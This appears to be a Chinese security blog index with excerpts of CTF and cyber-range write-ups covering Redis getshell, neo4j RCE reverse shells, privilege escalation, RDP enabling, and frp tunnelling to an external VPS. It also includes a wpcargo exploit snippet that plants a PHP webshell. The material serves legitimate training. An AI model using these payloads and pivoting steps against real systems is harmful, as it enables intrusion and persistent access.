春秋云境-Brute4Road
fscan扫一遍,发现存在redis未授权漏洞
用脚本getshell
发现没有权限读flag,发现可以利用base64命令suid提权
传个fscan上去扫一下内网
搭建frp
先尝试攻击搭建了wordpress的那台主机
wpscan扫一遍,扫出来有个wpcargo插件
用脚本写入木马
12345678910111213141516171819202122232425import sysimport binasciiimport requests# This is a magic string that when treated as pixels and compressed using the png# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png filepayload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'def encode_character_c ...
春秋云境-Time
Timefscan扫一遍
有7687端口,这是neo4j的端口。这里存在CVE-2021-34371未授权RCE,我们可以以此反弹shell
拿到flag1和提示kerberos的认证过程
上传fscan扫一下,扫出来还有三台主机
搭建frp,访问搭建了web服务的那台主机
这里可以用sqlmap一把梭,找到第二个flag
读取数据库中的用户表,总共有500个用户,把这些用户的名称都dump下来做成一个字典
12345678910import csvinput_csv = 'oa_users.csv'output_txt = 'usernames.txt'with open(input_csv, mode='r', encoding='utf-8') as csvfile: reader = csv.DictReader(csvfile) with open(output_txt, mode='w', encoding='utf-8') ...
春秋云境-Tsclient
fscan扫出来有mssql数据库,有了账号密码
用MUDT连接,先激活一下xpshell组件
上传SweetPotato成功提权
添加用户,开启远程登陆
开启远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
远程桌面连接上,找到第一个flag
查看ip,上传fscan扫内网
可以看到除了打下来的这台以外还有三台机器,一台域控,两台域内机器。
quser看到还有一个叫做john的用户通过rdp连接了
netstat查看网络连接状态,看到是来自域内另一个主机
到这里歇了歇,下次再做。
上传cs的后门并执行
注入进程
用户存在共享文件
底下有个文件读取一下,给了一个账号密码以及提示
用chisel搭建隧道
配置proxychains4
密钥喷洒发现密码过期了
随便选一台机器rdesktop登录修改密码
经过尝试,能远程桌面 ...
能源安全大赛2025 线下个人赛 Writeup
这次没有得奖(
做出来了一半的题目,都是各个方向比较基本的题。有一题比较遗憾,由于时间原因倒在了出答案的前一步,不然应该就能拿到奖了(
这次又成功面基了几位星盟的师傅:)
Cryptocrypto1
MiscMisc1找到一个表格
在cmdscan中找到密码
隐藏文字
UTF-7
CryptoCrypto1指数很小,爆破就行
1234567891011121314from Crypto.Util.number import *import gmpy2n=9331325916036496612720813635922258035280962812992949586840145674164931051507600783789222980650176801919878600008643559216407763411533381234754171656299952289485028219127499891446457980739880461801890066726815374085563241886502309603183517843971285910052682542705013 ...
春秋云境-Initial
先上fscan扫一遍,扫出thinkphp一个rce的洞
用工具,getshell
写个马进去
蚁剑连接
当前用户是www-data,需要提权
发现可以sudo提权,mysql被配置了root权限,去gtfobins上查一下
查找所有名字含flag的文件,找到flag01.txt
看下内网ip
用蚁剑传个fscan上去扫描一下(记得chmod 777 fscan)
可以看到除了我们打下来的这台主机外,还有三台主机:一台是信呼OA服务器,一台是DC域控,一台是个有永恒之蓝的洞的windows
接下来配置frp转发流量
frpc.ini
12345678[common]serverAddr = "60.204.245.37"serverPort = 7000[socks_proxy]type = tcpremote_port =6000plugin = socks5
frps.ini
12[common]bindPort = 7000
frpc通过蚁剑上传,frps上传到自己的vps上
用msf弹shell
将reverse.elf用蚁剑上 ...
春秋云境-漏洞靶标
CVE-2022-32991靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
随便注册一个账号先登录一下,来到题目所说的welcome.php
点start可以发现有很多的get参数
拿上cookie,用sqlmap能一把梭()
CVE-2022-30887靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
原来似乎可以通过访问网站开发者的个人网站找到其邮箱,现在好像删掉了。
密码则是弱口令,作者名字mayurik
成功登录后,由题目找到Medicine-Manage Medicine下存在文件上传漏洞,直接写一个一句话木马传上去
然后用蚁剑连接即可
CVE-2022-28512靶标介绍:
Fantastic Blog (CMS)是一个绝对出 ...
关于如何科学上网
237c7b37fdf7fec26f51a8dc4d10e6e5690f222e5e2c25948d9574ab25f1b4d6da3b4ee596272775f3d8948083836143f3927bb4981c2e5863d239f9cc06ace5367c3b9468276ec03d4cdf06d45c600ab491027a5ef268d24d67e48bd5576e0c89ff0c01f36d8680eb129521356e1f78d4db2e6ab046d3a4c69fe148f0924144595951ec110af6432a6264b55e2662971ed10358db7b6dd5e8766f27ed3d4962c0359bc2a7fefccb633df8bdb43857d08cca598f9fbb0403d8f7c9432895d061860c875885b5cf41f94205b333fb00ffa6d263867dfb6ba31628db73b90558e189663c103e24d1d8144ac889f9c8455ef22cbdf29a22415d2 ...
Parloo杯2025初赛 writeup+复现
这波Aura✌tql,仅凭一己之力干完了应急响应,本菜鸡直接被带飞OrzOrz
比赛的时候根本跟不上aura✌的进度,虽说看了题但是没做几道,现在好好复现一下。
除了应急响应以外的题就不复现了,都是musc。。。
主线第二届“Parloo”CTF应急响应挑战赛应急响应场景挑战说明手册.pdf
1 **提交堡垒机中留下的flag****附件下载地址:百度网盘 https://pan.baidu.com/s/1otqDnpKTOEsPZQiWSE8ECg?pwd=6666 提取码: 6666 夸克网盘 https://pan.quark.cn/s/46653bd06cca 123云盘 https://www.123865.com/s/qDVvjv-zVBod 提取码:6666***解压密码:应急响应环境解压密码网络拓扑环境 Skills@@@Skills@@@Skills 畸行的爱 Parloo&zgsfsys&onefox&solar*juyt
登录面板即可看到flag
palu{2025_qiandao_flag}
2 提交WAF中隐藏的flag
进入 ...
盘古石杯2025初赛 Writeup+复现(断更中)
这次混了个预赛二等奖,但同样未能成功晋级,菜炸了((唉好好复现学习一下吧以下是在w8nn9z、1n1t两位爷的帮助下一起尝试完成的复现Orz
服务器取证部分复现起来有点耗时耗力,暂时先搁置了。。。也许等下一次打取证比赛前会想起更新吧()
数据取证部分在网上没找到标准答案,就不复现了。
手机取证1分析安卓手机检材,手机的IMSI是?
460036641292715
2养鱼诈骗投资1000,五天后收益是?
在QQ聊天记录里可以找到
175
3分析苹果手机检材,手机的IDFA是?
E477D4C7-BD02-4979-BC9D-5C5DE7BD1F17
4Telegram应用的卸载时间是?
过滤卸载记录
2025-04-17-10:51:39
5机主hotmail邮箱地址是?
telegram聊天记录中有提到
hostsixer@hotmail.com
6苹果电脑开机密 ...
ISCC2025 Writeup
我们至今仍未知道ISCC主办方的心理,可以说是打过最烂的比赛了,没有之一
虽说有的史很难吃,但是有的题对于本菜狗来说还是能学到点东西的(
校赛Writeup点我区域赛Writeup点我决赛Writeup点我